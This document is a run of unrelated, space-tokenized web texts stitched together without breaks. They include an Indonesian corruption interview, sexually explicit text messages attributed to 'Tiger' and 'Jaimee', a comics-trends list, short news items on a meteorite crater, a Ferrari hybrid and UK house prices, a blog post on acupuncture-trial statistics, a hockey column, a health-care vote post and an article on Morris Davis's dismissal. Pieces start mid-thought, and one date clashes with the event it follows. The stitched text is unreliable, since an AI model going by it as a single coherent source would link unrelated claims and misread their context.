Because of that , people get angry when this institution is interfered with by the government .
Parliament is investigating the bailout and the possible roles played by arch - neoliberal vice - president Boediono and finance minister Sri Mulyani in orchestrating a deal .
Do you expect parliament to find the truth and take action against the corrupt politicians ?
No .
The special committee formed in the parliament is being controlled by Yudhoyono supporters .
Out of 30 members of this committee , only seven are from outside the ruling coalition of parties .
The chief of the committee , Idrus Marcham , is a Golkar politician who is well known as an opportunist and is suspected of being involved in a big sugar import scandal .
This committee is an attempt by Yudhoyono and parties of the elite to channel people ’s anxiety .
It will end with compromises and concessions that relieve the government of blame .
What is the potential for these corruption scandals to spark a new popular movement against the neo-liberal government of Yudhoyono ?
We are trying to evaluate this carefully .
Without doubt , Yudhoyono ’s credibility is collapsing in the eyes of the people , even in the eyes some of his disappointed supporters and voters .
His aggressive attitude in every speech he has made in response to popular demands has deepened the scandal .
This is taking place in the context of the mass of people remaining poor and deprived of the basic needs for survival because of the neoliberal regime ’s policy .
The prospects of a new mass uprising depend on two things : first , whether the anti-Yudhoyono regime forces can unite on a common platform of struggle , and second , the hard work to give a perspective of real change to majority of people , who are still largely non-ideological and not involved in political struggle .
Up until now the corruption issue has been used by the neoliberals to avoid the ideological discussion about the root causes of mass poverty .
They argue that “ corruption ” is the only cause of poverty in Indonesia .
But the only corruption which they are interested in ending is the corruption that disrupts their profit accumulation .
They do n't really care for the people ’s situation .
They almost succeeded in building a myth that Yudhoyono 's neoliberal regime is a " clean " government .
But Century Bank scandal has knocked down this myth .
Tiger : Hey Sexy I ca n’t come out this week .
Something came up family wise ( July 20 , 3:04 p.m. )
Jaimee :
That ’s okay I hope everything is fine … would have liked to see you
Tiger :
We will make it happen
Jaimee : I drove out for the night to surprise a friend with a present for there birthday ( July 26 , 11 : 22 p.m . )
Tiger : what kind of present your naked body
Jaimee : haha no a watch I slept alone
Tiger : alone with him that is
Jaimee : haha I wish
Jaimee : miss u ( Sept. 27 , 6:38 p.m. )
Tiger : now that ’s hot so who is your new boy toy
Jaimee : no new boy toy … still running dry … been on 2 real dates in the pat 2 months :(
Tiger : I need you
Jaimee : then get your tight ass over here and visit me !
I need u
Tiger : I will wear you out soon
Jaimee : how soon ?
I got a new piercing
Tiger : really .
Where
Jaimee : I just sent u a pic of it … is on my cheek below my eye … implanted a little diamond
Tiger : send it again .
I did n’t pick up on that
Tiger : you just need some attention from me
Tiger : do you have a boy friend ( 8:45 p.m . )
Jaimee : I do n’t even have someone I am dating … no … u can be my boyfriend ;)
Tiger : then I am
Jaimee : I wish
Tiger : quiet and secretively we will always be together
Tiger : when was the last time you got laid
Jaimee : if we hang out on a Sundway we can watch desperate houswives again haha ( Sept. 30 , 3:38 p.m. )
Tiger : oh god
Jaimee : take a break from watching boring old golf
Jaimee : I mean the amazing sport of golf ;)
Jaimee : [ more than an hour later ] babe I was kidding
Tiger : I know sexy
Jaimee : is it orange county time yet ?
( Oct. 1 , 6:06 p.m. )
Tiger : oh stop :)
Jaimee : hahaha I know … but you canceled on me last time so the anticipation is killing me … im finding myself watching sports center … haha j / k it is n’t that bad
Tiger : its never been that bad
Jaimee : very true … I only watch football
Tiger : Figured you would say that .
Big black guys .
Jaimee : u are my first , last and only black guy !
U should feel special
Tiger : why do I not believe that ?
Tiger : [ later , in response to Jaimee ’s mention of a date who was “ full of himself ” ] you kinda like that for some reason which is weird why you decided on me .
Tiger : having an asian mother and a military father you cannot and will not ever be full of yourself
Jaimee : I have fun with u , you always make me smile and I am not afraid to be myself or say anything to u … the day I met u I thought u were going to kick me out a few times but for someone reason you did n’t and u have told me numerous times I talk to much but slowly as I get to know u iI think your absolutely amazing
Tiger : you are wrong I ’m bone thugs in harmon
Jaimee : Something wrong babe ?
I was excited to sepnd time with u this week ( Oct. 15 , 6:40 p.m . )
Tiger : I will you Sunda night .
Its the only night in which I am totally free but I have to leave at 530 Monday morning to drive up to the valley for an outing for one of my sponsors .
See you at 8 pm on Sunday in newport
Tiger : do n’t text me back till tomorrow morning .
I have to many people around me right now
Tiger : send me something very naughty ( Oct. 18 , 3:40 p.m . )
Jaimee : some things are worth waiting for lol … besides im at work
Tiger : go to the bathroom and take it
Jaimee : haha ur too much
Jaimee : are u leaving me cause your wife is still in newport :(
I am lonely now … i like falling asleep in your arms ( Oct. 18 , 11:38 p.m . )
Tiger : sorry baby I just ca n’t sleep .
Its just a problem I have .
Tiger : she is not here .
They left this morning
Jaimee : well I appreciate you not wanting to wake me up but if y could n’t sleep I would have rather sat up and talked to u more … find out why I keep falling more and more for u ;)
Tiger : Because I ’m blasian :)
Tiger : I ’m sorry babe .
Im already home .
Jaimee : I ’m putting my underwear back on … thats a no no … come take them off
Tiger : :) you are too funny
Tiger : happy thanksgiving to you ( Nov. 26 , 11:16 a.m. )
Jaimee : u too love
tweetmeme_url = ' http://comicsalliance.com/2009/12/30/lets-not-see-this-in-2010-comics-trends-that-need-to-go-away/'; tweetmeme_source = ' ComicsAlliance ' ;
As we head towards the end of the year -- and the end of a decade , if you 're not a stickler for how dates actually work -- it 's time to say goodbye to all the things that made 2009 what it was .
Of course , not all of those things were good , and there 's plenty of stuff in the world of comics that we 're willing to say goodbye to as a new beginning approaches .
Whether it 's tropes that have been run into the ground , convenient plot tricks that wo n't stay out of otherwise good stories , or just the stuff we 're plain sick of , we 've gotten ComicsAlliance contributor and noted haterologist Chris Sims to offer up his five picks for the trends in comics from the past decade we 're hoping we do n't see in 2010 !
But before we go on , a quick Spoiler Warning !
Some of what we talk about references recent events , so read at your own risk !
Forced Overcharacterization
Even more than their powers , every super - hero needs to have something in their character that defines them .
Superman 's not just a guy who can fly and shoot death rays out of his eyes , he 's a guy who wants nothing other than to use those powers to help his fellow man , and Spider - Man 's wall - crawling , web - swinging action would n't draw as many readers as it has without the sense of responsibility that comes along with them .
And that 's as it should be , characters need ... well , character if they 're going to succeed .
The problem comes when creators decide it's a good idea to hammer completely unnecessary elements onto their characters that come out of nowhere .
Specifically , we 're thinking of recent events like the Blackest Night tie-ins of " Green Lantern Corps , " where Kyle Rayner and Soranik Natu love each other so hard that it literally brings Kyle back to life .
On the surface , that 's not much weirder than the idea of a team of aliens with magic green wishing rings battling zombies in outer spaaaaaaaace , and if it was just a matter of Soranik ( who is already a gifted surgeon ) using the famous willpower of the Green Lanterns to do it , it'd be a great moment , but when the power of the rings is mixed in with the power of love and the Care Bear Stare or whatever else is going on in " Blackest Night , " it rings a little false .
Is the love of Kyle Rayner and Soranik Natu really the love that can conquer death itself ?
Of all the people in the universe , they 've got the strongest love of all time ?
And by the same token , what was it about Spider - Man 's marriage that Mephisto wanted so badly ?
Was the goodness and purity of the union between a model / actress who spent most of her time wondering if she should break it off and a hard - luck hero who kept wishing his college girlfriend had n't taken a header off a bridge really that much of an affront to the Devil ?
Heck , you 'd think he'd want Peter and MJ to be miserable .
Look at it this way : Every member of the G.I .
Joe team has the same basic skills , but Snow Job does n't need to be an expert scuba diver , and Torpedo does n't need to strap on the skis for Arctic adventure .
Everyone fills a role , and while it 's good to branch out , it 's a lot better when it happens as an organic development of the character rather than the fickle whim of a plothammer .
Everything Must Be Explained
Rifle through any given Siver Age Superman or Batman comic , and chances are you 're going to find a story that explains , in exact , excruciating detail , the tiniest detail of those characters , from who makes Batman 's shoes to why Clark Kent wears a wristwatch , and while we love Silver Age stories , they 're great in spite of the slavish devotion and attention to minutiae .
And yet , the same thing 's coming back around and happening again : Power Girl can't just wear her costume because either she likes it ( or because Wally Wood liked it , if you want to get all meta about it ) , she has to have lengthy , often tear - filled explanations of why that serves the same function as a fifty foot - tall neon sign reading " IGNORE THIS . "
Barry Allen can't just be a nerd who wears a bow - tie , he 's got to have some sort of character - defining sentimental reason to wear the bow - tie , as though there are aspects of his character that can only be explained by what he wears when he's not doing the things that actually do reveal his character .
And Hal Jordan , of course , had gray hair because of a giant yellow space bug made of scary thoughts .
There 's nothing wrong with detail , and in fact , making sure characters have reasons for the things they do is a step that can lead to some pretty awful comics if it 's overlooked , but when you 're attaching false significance to things that were never meant to have them , then it 's just another example of overcompensating for the inherent strangeness of super - heroes with an overbearing , ham - handed seriousness .
Did Spider - Man really need to have totemic spider - powers ?
Was the idea of a radioactive spider giving someone the power to stick to walls really too silly for the Core Marvel Universe ?
No , and thankfully , that was done away with .
Now if only we could get the rest of that stuff out of the way .
And for the record , Superman 's wristwatch contains a chunk of Kryptonite that he can expose himself to if anyone ever asks him if he has super - powers , so that he can tell them he does n't without lying , as the Kryptonite will have temporarily removed them .
Saying " no " would 've been too dishonest , unless it was to Lois Lane .
Whose Comic Is It , Anyway ?
ComicsAlliance that might reflect the opinions of our writers rather than the comics - reading public at large , but we really do n't think it 's a stretch to say that a book called " Superman " should probably have Superman in it .
We realize that we make a lot of generalities here onthat might reflect the opinions of our writers rather than the comics - reading public at large , but we really do n't think it 's a stretch to say that Admittedly , it 's possible to do a good comics where the title character does n't appear -- though we 're having an awful lot of difficulty trying to think of one that was focused on secondary characters for months at a time -- and we 're not saying that changing up an established cast is itself a bad thing .
Two of our favorite comics of the year , " Detective Comics " and " Incredible Hercules , " started out by replacing the books ' previous headliners , swapping out Batman for Batwoman in ' Tec and switching out the otherwise - occupied Hulk for Marvel 's other strong - man .
The key difference with those , however , is that when you pick them up in the store , the person whose name is on the cover is still actually who the book 's about .
" Superman , " however ...
Well , there 's no other way to say it : Superman is n't in " Superman . "
Instead , " Superman " currently stars Mon-El , who looks kind of like Superman and has most of Superman 's powers and just got a new costume that has Superman 's logo on it but , despite what appears to be an amazing effort to convince us of the contrary , is not Superman .
And we 're pretty sure that 's way more complicated than it needs to be .
" Damaged Women "
All right , look :
We know you 're just as tired of us writing about it as we are of having to write about it , so we 'll just let Gail Simone 's twitter feed say it for us :
If I could have any present from comics this year , it'd be the end of the idea that a female character has to be damaged to be " strong . "
It is n't that no female characters can be damaged , it 's the idea that that 's the only way to make them interesting that is goofy and cliche .
So seriously , knock that off , if for no other reason than Gail deserves a present .
Magog
Originally , this was going to be a plea to stop giving ongoing series to characters that nobody likes in hopes that they 'll catch on , but the more we think about it , the more we realize that going out on a limb to give characters a shot is better than the alternative of just doing the same things over and over .
Sure , a lot of 'em are bad , but for every Gunfire , there 's a Hitman , for every Vigilante there 's an Aztek , and for every Red Tornado ( a character that would have all the appeal of a seasick crocodile even if William Shakespeare and Michelangelo were working on his comic ) , there 's a Nomad : Girl Without a World ( this year 's surprisingly fun mini-series that did the impossible and took Bucky from " Heroes Reborn " and did a good story ) .
Seriously though , Magog , the character created by Mark Waid Alex Ross to be " everything we hate in modern superhero design , " who is now the grandson of FDR ( making him a legacy character for an actual person ) and managed to get in both a team book and an ongoing series while books like " Catwoman " and " Blue Beetle " got the axe ?
Yeah , that guy is terrible .
AN ABORIGINAL
Dreaming story about a star crashing to earth with a noise like thunder has led to the discovery of an ancient meteorite crater in central Australia .
A Sydney astronomer , Duane Hamacher , found the bowl - shaped crater in Palm Valley , about 130 kilometres south - west of Alice Springs , by searching on Google Earth .
Astrophysicist Tui Britton in a meteorite impact crater discovered in Palm Valley in Northern Territory .
He was inspired to look there after learning of traditional stories told by the local Arrernte people about a star that had fallen into a waterhole called Puka in the valley .
Mr Hamacher , a PhD candidate at Macquarie University , said that reality matching the Dreaming story could be a case of pure chance .
'' But if so , it 's an incredible coincidence , '' he said .
Ferrari's long - rumored gas - electric supercar could break cover as early as spring .
Italy 's Quattroroute magazine says Maranello is building a hybrid based on the 599 GTB Fiorano ( shown above ) using a variation of the kinetic energy recovery system in its Formula 1 cars .
The concept car could appear at the Geneva auto show in March .
Quattroroute says the system uses a V12 engine up front with an electric motor at the rear transaxle and a lithium - ion battery .
In addition to an added boost in power , the system provides the car with a start - stop function and regenerative braking .
It reportedly delivers a 35 percent improvement in fuel economy .
We 've long known Ferrari is up to something .
Britain 's Autocar reported last month that Ferrari has a hybrid drivetrain slated for the successor to the 612 Scaglietti and we 'll see it in 2014 .
But Autocar says the system uses an electric motor inboard of the front wheels to improve handling , not fuel economy .
The idea is having electric motors up front will improve acceleration and handling because the torque delivered to the wheels can be “ carefully controlled . ”
Whatever the case , it appears a gas- electric from Maranello is just over the horizon .
Photo : Ferrari
See Also :
Shares
Credibility alert : the following post contains assertions and speculations by yours truly that are subject to , er , different interpretations by those who actually know what the hell they ’re talking about when it comes to statistics .
With hat in hand , I thank reader BKsea for calling attention to some of them .
I have changed some of the wording — competently , I hope — so as not to poison the minds of less wary readers , but my original faux pas are immortalized in BKsea ’s comment .
Lies , Damned Lies , and …
A few days ago my colleague , Dr. Harriet Hall , posted an article about acupuncture treatment for chronic prostatitis / chronic pelvic pain syndrome .
She discussed a study that had been performed in Malaysia and reported in the American Journal of Medicine .
According to the investigators ,
After 10 weeks of treatment , acupuncture proved almost twice as likely as sham treatment to improve CP / CPPS symptoms .
Participants receiving acupuncture were 2.4 - fold more likely to experience long - term benefit than were participants receiving sham acupuncture .
The primary endpoint was to be “ a 6 - point decrease in NIH - CSPI total score from baseline to week 10 . ”
At week 10 , 32 of 44 subjects ( 73 % ) in the acupuncture group had experienced such a decrease , compared to 21 of 45 subjects ( 47 % ) in the sham acupuncture group .
Although the authors did n’t report these statistics per se , a simple “ two - proportion Z- test ” ( Minitab ) yields the following :
Sample X N Sample p 1 32 44 0.727273
2 21 45 0.466667
Difference = p ( 1 ) – p ( 2 ) Estimate for difference : 0.260606 95 % CI for difference : ( 0.0642303 , 0.456982 )
Test for difference = 0 ( vs not = 0 ) : Z = 2.60 P - Value = 0.009
Fisher ’s exact test : P - Value = 0.017 … Wow !
A P-value of 0.009 !
That ’s some serious statistical significance .
Even Fisher ’s more conservative “ exact test ” is substantially less than the 0.05 that we ’ve come to associate with “ rejecting the null hypothesis , ” which in this case is that there was no difference in the proportion of subjects who had experienced a 6 - point decrease in NIH - CSPI scores at 10 weeks .
Surely there is a big difference between getting “ real ” acupuncture and getting sham acupuncture if you ’ve got chronic prostatitis / chronic pelvic pain syndrome , and this study proves it !
Well , maybe there is a big difference and maybe there is n’t , but this study definitely does not prove that there is .
Almost two years ago I posted a series about Bayesian inference .
The first post discussed two articles by Steven Goodman of Johns Hopkins : Goodman SN .
Toward evidence - based medical statistics .
1 : The P value fallacy .
Ann Intern Med. 1999;130:995-1004 .
I wo n’t repeat everything from that post ; rather , I ’ll try to amplify the central problem of “ frequentist statistics ” ( the kind that we ’re all used to ) , and of the P - value in particular .
Goodman explained that it is logically impossible for frequentist tools to “ both control long - term error rates and judge whether conclusions from individual experiments
[ are ] true . ”
In the first article he quoted Neyman and Pearson , the creators of the hypothesis test :
… no test based upon a theory of probability can by itself provide any valuable evidence of the truth or falsehood of a hypothesis .
But we may look at the purpose of tests from another viewpoint .
Without hoping to know whether each separate hypothesis is true or false , we may search for rules to govern our behaviour with regard to them , in following which we insure that , in the long run of experience , we shall not often be wrong .
Goodman continued :
It is hard to overstate the importance of this passage .
In it , Neyman and Pearson outline the price that must be paid to enjoy the purported benefits of objectivity :
We must abandon our ability to measure evidence , or judge truth , in an individual experiment .
In practice , this meant reporting only whether or not the results were statistically significant and acting in accordance with that verdict .
… the question is whether we can use a single number , a probability , to represent both the strength of the evidence against the null hypothesis and the frequency of false - positive error under the null hypothesis .
If so , then Neyman and Pearson must have erred when they said that we could not both control long - term error rates and judge whether conclusions from individual experiments were true .
But they were not wrong ; it is not logically possible .
The idea that the P value can play both of these roles is based on a fallacy : that an event can be viewed simultaneously both from a long - run and a short - run perspective .
In the long - run perspective , which is error - based and deductive , we group the observed result together with other outcomes that might have occurred in hypothetical repetitions of the experiment .
In the “ short run ” perspective , which is evidential and inductive , we try to evaluate the meaning of the observed result from a single experiment .
If we could combine these perspectives , it would mean that inductive ends ( drawing scientific conclusions ) could be served with purely deductive methods ( objective probability calculations ) .
These views are not reconcilable because a given result ( the short run ) can legitimately be included in many different long runs …
It is hard to overstate the importance of that passage .
When applied to the acupuncture study under consideration , what it means is that the observed difference between the two proportions , 26 % , is only one among many “ outcomes that might have occurred in hypothetical repetitions of the experiment . ”
Look at the Minitab line above that reads “ 95 % CI for difference : ( 0.0642303 , 0.456982 ) . ” CI stands for Confidence Interval : in the words of BKsea , “ in 95 % of repetitions , the 95 % CI ( which would be different each time ) would contain the true value . ”
We do n’t know where , in the 95 % CI generated by this trial ( between 6.4 % and 45.7 % ) , the true difference lies ; we do n’t even know that the true difference lies within that interval at all ( if we did , it would be a 100 % Confidence Interval ) !
Put a different way , there is little reason to believe that the “ center ” of the Confidence Interval generated by this study , 26 % , is the true proportion difference .
26 % is merely a result that “ can legitimately be included in many different long runs … ”
Hence , the P - value fallacy .
It is that point — 26 % — that is used to calculate the P - value , with no basis other than its being as good an estimate , in a sense , as any : it was observed here , so it ca n’t be impossible ; when looked at from the point of view of whatever the true proportion difference is , it has a 95 % chance of being within two standard deviations of that value , as do all other possible outcomes ( which is why we can say with ‘ 95 % confidence ’ that the true proportion is within two standard deviations of 26 % ) .
You can see that the CI is a better way to report the statistic based on the data , because it does n’t “ privilege ” any point within it ( even if many people do n’t know that ) , but the CI will also steer us away from being wrong only in “ the long run of experience . ”
CIs , of course , will be different for each observed outcome .
The P - value should not be used at all .
Now let ’s look at a graph from the acupuncture report :
Figure 3 . Mean NIH -CPSI total scores of 89 chronic prostatitis / chronic pelvic pain patients treated with 20 sessions of either acupuncture ( n = 44 ) or sham acupuncture ( n = 45 ) therapy over 10 weeks .
Error bars represent the SD .
To enter into the study , each participant had a minimum NIH - CPSI total score of at least 15 ( range 0 - 43 ) on both baseline visits ( indicated as the average in the baseline value ) .
The primary criterion for response was at least a 6 - point decrease from baseline to week 10 ( end of therapy ) .
There was no significant difference between the NIH - CPSI total scores in the acupuncture and sham acupuncture groups at baseline , week 5 ( early during therapy ) , or weeks 14 , 22 , and 34 ( post - therapy ) evaluations .
* Of 44 participants in the acupuncture group , 32 ( 72.7 % ) met the primary response criterion , compared with 21 ( 46.7 % ) of 45 participants in the sham acupuncture group ( Fisher ’s exact test P = .02 ) .
‡ At week 34 , 14 ( 31.8 % ) of 44 acupuncture group participants had long - term responses ( with no additional treatment ) compared with 6 ( 13.3 % ) of 45 sham acupuncture group participants ( RR 2.39 , 95 % CI , 1.0 - 5.6 , Fisher ’s exact test P = .04 ) .
Hmmm .
I dunno about you , but at first glance what I see are two curves that are pretty similar .
They differ “ significantly ” at only two of the six observation times : week 10 and week 34 .
Why would there be a difference at 10 weeks ( when the treatments ended ) , no difference at weeks 14 and 22 , and then suddenly a difference again ?
Is it plausible that the delayed reappearance of the difference is a treatment effect ?
The “ error bars ” do n’t even represent what you ’re used to seeing : the 95 % CI .
Here they represent one standard deviation , not two , and thus only about a 68 % CI .
Not very convincing , eh ?
OK , I ’m gonna give this report a little benefit of the doubt .
The graph shown here is of mean scores for each group at each time ( lower scores are better ) .
That is different from the question of how many subjects benefited in each group , because there could have been a few in the sham group who did especially well and a few in the ‘ true ’ group who did especially poorly .
It is bothersome , though , that this is the only graph in the report , and that the raw data were not reported .
Do you find it odd that the number of ‘ responders ’ in each group diminished over time , even as the mean scores continued to improve ?
Just for fun , let ’s see what we get if we use the Bayes Factor instead of the P - value as a measure of evidence in this trial .
Now we ’ll go back to the primary endpoint , not the mean scores .
Look at Goodman ’s second article :
Minimum Bayes factor = e- Z² /
2
At 10 weeks , according to our statistics package , Z = 2.60 .
Thus the Bayes factor is 0.034 , which in Bayes reasoning is “ moderate to strong ” evidence against the null hypothesis .
Not bad , but hardly the “ P = 0.009 ” that we have been raised on and most of us still cling to .
The Bayes factor , of course , is used together with the Prior Probability to arrive at a posterior probability .
If you look on p. 1008 of Goodman ’s second paper , you ’ll see that as strong as this evidence appears at first glance , it would take a prior probability estimate of the acupuncture hypothesis being true of close to 50 % to result in a posterior probability ( of the null being true ) of 5 % , our good - ol ’ P - value benchmark .
Some might be willing to give it that much ; I ’m not .
Now for the hard part
This has been a slog and I ’m sure there are only 2 - 3 people reading at this point .
Nevertheless , here ’s a plug for previous discussions of topics that came up in the comments following Harriet ’s piece about this study :
Science , Reason , Ethics , and Modern Medicine , Part 5 : Penultimate Words
Science , Reason , Ethics , and Modern Medicine , Part 4 : is “ CAM ” the only Alternative ?
Science , Reason , Ethics , and Modern Medicine , Part 3
Science , Reason , Ethics , and Modern Medicine , Part 2 : the Tortured Logic of David Katz
Science , Reason , Ethics , and Modern Medicine Part 1
DANIEL :
The play of Sheldon Brookbank over the past few games has been nothing short of inspiring .
Clearly he attended the same " get ready for every game no matter how badly the team that employs you wants to forget that you exist and have a more than serviceable skill set at your disposal " school of professional preparation as Erik Christensen .
Brookbank 's time with the Ducks , and his career , has been centered on the belief that he is more of an extra defenseman than an everyday player .
However , his recent play has earned him a consistent spot on Anaheim 's third pairing along with Ryan Whitney .
Normally , Duck Calls are n't supposed to about stats , but Brookbanks stat line since he returned to the line up reads as such : 0 - 2= 2 , +4 , 14 PIM .
To be fair , 10 of those 14 penalty minutes are from two fighting majors .
When Brookbank is in the line up , his willingness to protect his teammates and be the enforcer gives Carlyle the option of scratching Parros and using more of our depth at forward .
Carlyle is only playing Brookbank 12 - 13 minutes a night , a number that will assuredly go up but probably not higher than 15 minutes , which means Brookbank can be an enforcer without limiting his ability to do his job effectively .
My favorite thing about Brookbank is that he has the makings of a solid stay at home guy .
Something I 've been crying for in almost every trade discussion we 've had for the past month .
Brookbank does n't make bad decisions with the puck .
Yes he can be pressured into turnovers , but who can 't ?
The real point is that he does n't take risks with the puck .
As Zupke from the OC Register points out Brookbank has n't given the puck away once in the past two games .
He uses the glass , uses his body , and uses his partner to make sure the puck does n't end up in the other team 's hands in the defensive zone .
He hardly ever pinches , and when he does shoot it finds the net .
Again , the sign of a player who makes the right decision and shoots when he has to , when he knows the puck wo n't get blocked and go the other way .
He frustrates the other team with his ability to move the puck out of danger quickly , essentially nullifying the forecheck .
He does n't have the size to dominate the net , but he has the toughness and nastiness to make sure you pay a price to get that goal .
Brookbank is mean , makes the opposition work , and does n't surrender the puck .
Something we 've been missing on the backend for a while now .
I think he should see more PK time , but that 's just me .
Finally , I 'd like to thank Brookbank for giving Bob Murray a helping hand .
While Eminger was most assuredly playing poorly when Carlyle took him out of the line up , it was a stretch of about 5 games where he had trouble with turnovers ,
He was playing fairly decent D before that .
In his first 11 games he was only a - 1 .
Essentially , the emergence of Brookbank means we have at least one more D we can move at the deadline .
Boynton and Eminger have been susceptible at times , and Wisniewski , despite his many mental lapses and fragility , would still be appealing to a contender .
Meanwhile , Brookbank is cheap , tough and does everything you ask of him .
It 's hard not to like a guy with those characteristics .
Brookbank will let Murray sweeten a deal , either by being in it or allowing us to move someone else .
Brookbank 's contributions since he returned to the line up have helped steady us on the blueline .
For all that and being a stand up guy when the Ducks ran him through the ringer , Sheldon Brookank gets a Duck Call .
Prices will probably keep on rising , Rics suggests
House prices are still being driven up by a relative shortage of properties for sale , says the Royal Institution of Chartered Surveyors ( Rics ) .
Its latest monthly survey , for November , suggests that prices have risen for the fourth month in a row .
The number of surveyors reporting price rises outstripped those reporting falls , with a positive balance of 35 % .
Separate government figures showed that UK house prices rose by 2.3 % in the three months to October .
Supply shortage Rics carries out its assessment of the state of the market by asking its members a series of questions about prices , supply and demand .
It still indicative of an increasing level of buyer interest in the market
Royal Institution of Chartered Surveyors
It said the latest figures were the strongest reading since November 2006 and said the trend was likely to continue .
" For the fourth month in a row , the survey points towards prices rising , even though the general state of the economy would suggest that the housing market should not be faring as well as it is , " said Rics spokesman Ian Perry .
" Despite modest increases in the number of properties coming on to the market , it is clear that this is not significant enough to keep pace with the levels of demand .
" Buyer enquiries are continuing to grow and with the pace of job losses now easing , the risk is that the new year could see a further wave of interest in the market , " he added .
New instructions to sell have risen for six consecutive months , but they have been outstripped by extra enquiries from potential new buyers .
' Modest pace '
The proportion of surveyors reporting an increase in new sellers instructions outweighed those reporting a fall , by 18 % .
Prices are rising fastest in London and the south - east of England
But the balance in favour of those reporting more enquiries from potential new buyers was much stronger at 28 % , although this was down a bit from the 30 % balance recorded the previous month in October .
" It is still indicative of an increasing level of buyer interest in the market , " Rics said .
" The implication of the latest set of results is that fresh supply of stock is continuing to lag behind the increase in demand .
" [ This ] provides further evidence that most housing market activity indicators continue to improve , albeit at a more modest pace than in previous months , " Rics added .
Once again prices seem to be rising fastest in London and the south - east of England .
" This month has seen an increase in genuine applicants wishing to purchase resulting in a larger volume of sales , " said Stephen Whitley of surveyors R. Whitley in West Drayton .
John King , of surveyors Quinton Scott in Wimbledon , said : " The high level of buyer enquiries covering a wide price range has increased sale activity only held back by the lack of stock . "
Price survey
In a separate survey , figures from the Department for Communities and Local Government showed that UK house prices were 2.2 % lower in October than the same month a year earlier , but 0.5 % higher than in September 2009 .
This pushed up the price of the average UK home to £ 198,450 .
The uplift in prices has pushed the annual change in Scotland into positive territory .
Year - on - year prices rose by 0.7 % in Scotland , compared with falls of 2.1 % in England , 4.5 % in Wales , and 14.8 % in Northern Ireland .
Annual average house prices paid by first - time buyers in October 2009 were 0.1 % lower than a year ago .
However , average house prices paid by former owner - occupiers were 3 % lower .
" The property market does not exist in a vacuum and cannot disconnect entirely from its immediate environment , " said Catherine Penman , head of research at property consultancy Carter Jonas .
" Prices are likely to remain stable in 2010 , especially prior to the general election , when caution will remain the watchword .
Certain properties , however , will continue to defy market conditions and sell well , in many cases at 2007 levels . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The US House or Representatives officially passed H.R. 3962 , The Affordable Health for America Act , at 11:15 PM ET upon the confirmation of the tally by House Leader Nancy Pelosi ( D ) ; although the qualifying number of votes were cast 8 minutes earlier :
The final vote was 220 Ayes to 215 Nays :
The lone Republican voting for the measure was Rep. Joseph Cao of Louisiana 's Second District .
The House adjourned until Monday at 6 PM , after a fourteen and a half hour session .
There will probably be several press conferences from each party at some point ; you can watch live on CSPAN.org or check your local TV Listing for the channel number in your area .
Update [ 12:25 AM , CT 9/8/2009 ] : Immediately following the passage of the bill , and before the Democratic press conference , CSPAN fielded callers from around the country .
Below is one of these such exchanges :
@ 6:08 Announcer : Lets hear what you have to say about the debate today .
This is Pam in San Diego , California against the bill ; go ahead .
Pam : Yeah .
My name is Pam , and I am very much against any bill , on any kind of insurance , because insurance is not an airbag to protect you .
Insurance does not buy healthcare ; there is something , just , infinitely wrong with the idea that doctors are actually taking care of people .
[ emphasis added ]
Source : CSPAN.org Video Library
The bolded text above is probably the most vile and incompetent critique of healthcare reform possible .
Insurance does buy healthcare , in fact it 's the purpose of having insurance ; you spend money , i.e. you buy insurance , and in turn , you receive healthcare .
Insurance is the exchange of money for access to healthcare within a distributed stress system .
The general concept of insurance places roughly equal burden upon all participants in exchange for assistance when a statistical anomaly occurs , such as cancer .
Insurance buys access to , in this example , healthcare for cancer ; this healthcare is probably not affordable , without insurance , for the average American [ pg. 5 ] .
Secondly , the purpose of doctors is to take care of people ; which I thought was a common sense notion , but apparently I was wrong .
The Hippocratic Oath , the corner stone of ethical medicine , seems to hint at a doctor 's need to care for their patients :
... I will apply dietetic measures for the benefit of the sick according to my ability and judgment ; I will keep them from harm and injustice .
...
Whatever houses I may visit , I will come for the benefit of the sick , remaining free of all intentional injustice , of all mischief and in particular of sexual relations with both female and male persons , be they free or slaves .
...
Source : PBS NOVA
The statements by Pam above , are without a doubt , the most ignorant things I have ever heard relating to the healthcare debate .
So much for the First Amendment .
Morris Davis , the retired Air Force Colonel who served as the Chief Prosecutor of the Military Commissions at Guantánamo from September 2005 until his resignation in October 2007 , has just lost his job at the Congressional Research Service ( a branch of the Library of Congress ) for writing , in his personal capacity , an op - ed for the Wall Street Journal , in which he drew on his wealth of experience of the Commissions to criticize the Obama administration for its decision to prosecute some Guantánamo prisoners in federal courts , and others in Military Commissions , and a letter to the Washington Post , in which he criticized former Attorney General Michael Mukasey for scaremongering about the administration ’s decision to try Guantánamo prisoners in federal courts .
In a letter dated November 20 , Daniel P. Mulhollan , the director of CRS , told Col .
Davis that he had not shown “ awareness that your poor judgment could do serious harm to the trust and confidence Congress reposes in CRS , ” and notified him that he would not be kept on after his one - year probationary period at CRS ends on December 21 .
The ACLU immediately stepped in , sending a letter on Friday to Dr. Jim Billington , the Librarian of Congress , arguing that “ CRS violated the First Amendment when it fired Davis for speaking as a private citizen about matters having nothing to do with his job there , and that CRS must reinstate Davis to his position in order to avoid litigation . ”
Aden Fine , staff attorney with the ACLU First Amendment Working Group , said , “ The First Amendment protects Col .
Davis ’s right to speak and write as a private citizen about issues on which he has personal knowledge .
Col .
Davis did n’t give up his right to express his opinions and first - hand knowledge about a matter of such public importance when he left the military commissions system and went to work at CRS . ”
In correspondence over the weekend , Col .
Davis reinforced the ACLU ’s views , explaining :
I am the head of the Foreign Affairs , Defense , and Trade Division at the Congressional Research Service ( one of five CRS research divisions ) at the Library of Congress .
My division does not now nor has it ever had responsibility for providing Congress with advice on military commissions ; that responsibility resides with the American Law Division …
The Library of Congress has a regulation on outside activities for staff and it “ encourages ” outside writing and speaking on topics outside the staff member ’s area of responsibility and the Congressional Research Service has a similar policy …
In short , it was clear that I was prohibited from expressing my opinions publicly on matters within my area of responsibility , but I believe I retained the same right as all citizens to express opinions on matter outside the scope of my official duties .
He added :
The First Amendment guarantees the right of free speech and the Supreme Court has long recognized that public employment does not override that right ( although regulation of speech is permissible when related to an employee ’s official duty … and as noted , I have absolutely no official duty connected to military commissions ) .
It is ironic that our offices are located in the James Madison Building , which is named for the “ Father of the Constitution ” and the primary architect of the Bill of Rights who led the effort to secure the right of free speech .
I suspect Mr. Madison would be surprised to learn that the right he cherished is denied those working in the building that bears his name .
Morris Davis and the ACLU are right , of course , and I hope that Davis is reinstated .
